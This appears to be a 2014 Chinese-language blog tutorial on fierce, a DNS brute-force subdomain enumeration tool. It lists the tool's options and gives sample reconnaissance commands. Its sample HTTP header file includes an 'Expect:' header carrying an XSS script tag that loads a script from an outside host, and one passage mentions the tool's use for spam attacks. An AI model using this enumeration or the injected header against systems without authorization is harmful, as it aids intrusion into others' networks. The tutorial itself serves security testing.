2014年6月2日 星期一

fierce:比dnsdirct6更強的 DNS 暴力猜解工具(不支援 IPv6)

之前介紹「dnsdirct6」暴力猜解DNS的工具,今天再介紹另一套相似的工具 -- fierce,經測試,在使用內建字典檔情況下,它比 dnsdirct6 挖出更多的主機名,它使用 nearby IP 的方式,可以用已查到的IP為基底,進行前、後各幾組 IP 的猜測,跟 dnsdirct6 相比,它還有幾項功能:
  1. 可以對查找到的主機傳送連線表頭,讓主機吐出更多資訊 -- connect
  2. 可以對大範圍的 IP  進行反解 --  range / wide
  3. 可以將查詢結果直接存成檔案 --   file
可惜目前未支援 IPv6。
平常使用只要下:「 fierce -dns DOMAIN 」即可,使用超簡單,如要更多功能,可以參考下列的參數:
用法: fierce -dns example.com [OPTIONS]


選項:
  • -connect HEADER檔案
    利用指定的 HEADER檔案 (見底下的「header 檔案的簡易範例」)嘗試對公開的網路進行 http 連線,並記錄該網站的回應(如有),要注意,如果目標網域有許多開放網址,此選項將耗費許多連線時間。通常不建議使用此一選項,除非你很有時間(幾小時到幾天)。
    在 HEADER檔案 裡,其中 "Host:\n" 這一行是要連結的主機,fierce 會自動利用暴力猜解得到的主機填入其中。
    範例語法: fierce -dns example.com -connect headers.txt
  • -delay SEC
    指定暴力查詢間的間隔秒數。
  • -dns DOMAIN
    想要進行猜解的對象
  • -dnsfile DOMAIN-LIST-FILE
    指定進行 ip 反解的 dns server 清單檔案,一行一筆。(可配合 -range 使用)。
  • -dnsserver  DNS-SERVER
    使用單一的 dns server 進行 ip 反解(見 -dnsfile)
  • -file OUTPUT-FILE
    指定要儲存結果的輸出檔,如果不指定,猜解結果只會顯示在螢幕上。
  • -fulloutput
    配合 -connect 選項,除了傳送的 header 外,也會記錄被測對象回傳的結果。
  • -help   輔助說明訊息。
  • -nopattern
    當查找附近主機(nearby IP)時,不使用「樣板比對」方式,而是傾印所有資訊,雖然輸出資料比較敏雜,但可以挖掘出更多可能的網址,尤其是要利用垃圾郵件攻擊。但同時這個選項也比較可能造成誤判!
  • -range IP1-IP2
    利用 -dnsserver 對指定的 IP 範圍進行暴力反解,以取得相關資訊。(此選項不支援 樣版比對,而且不支援 fulloutput
    範例語法: fierce -range 111.222.333.0-255 -dnsserver ns1.example.com
  • -search Name1,Name2,...
    利用 nearby IP查找時,可能找到其他公司中不同 DOMAIN 的server,利用此 -search 指定的 Name-List 可以將不同的 DOMAIN 包含到查詢的名單中,這樣可以挖掘到更多的 Server 資訊
    使用範例: fierce -dns example.com -search corpcompany,blahcompany
  • -suppress
    當跟 -file 合用時,會壓縮所有 TTY 輸出。
  • -tcptimeout SEC
    預設的逾時是 10秒,如果遇到 DNS 反應慢或網路通訊慢時,可以調增逾時的秒數。
  • -threads N
    指定在猜解時要用幾個執行緒(預設為 1)。
  • -traverse N
    指定在找到一組 IP 後,要以此 IP 為準進行前、後各幾組(預設 5) 的查找(nearby IPs)
  • -version
    查看 fierce 的版本。
  • -wide
    對整個 C class 的IP範圍進行猜解。(-range 是自行指定範圖)
  • -wordlist Name-List-File
    自行指定暴力測試的字典(一行一個字(名稱))
    範例語法: fierce -dns example.com -wordlist dictionary.lst

雖然 fierce 有許多加強的功能,不過實戰中常用的語法只有幾項:
  1. fierce -dns example.com.tw  -threads
    (基礎型,使用 8 組執行緒)
  2. fierce -dns example.com.tw -threads 8 -connect header.txt -file output.txt 
    (測試並輸出至檔案)
  3. fierce -range 192.168.1.100-200 -dnsserver dns.example.com.tw 
    (進行IP範圍反解)
  4. fierce -dns example.com.tw -wide -dnsserver dns.example.com.tw 
    (對整個 C class 做反解測試)
header 檔案的簡易範例:(也可以自行編寫更複雜的 header)
GET / HTTP/1.0
User-Agent: Mozilla/5.0
Host:
Expect: <script src=http://ha.ckers.org/xss.js></script>
標籤: , ,

沒有留言:

張貼留言

訂閱: 張貼留言 (Atom)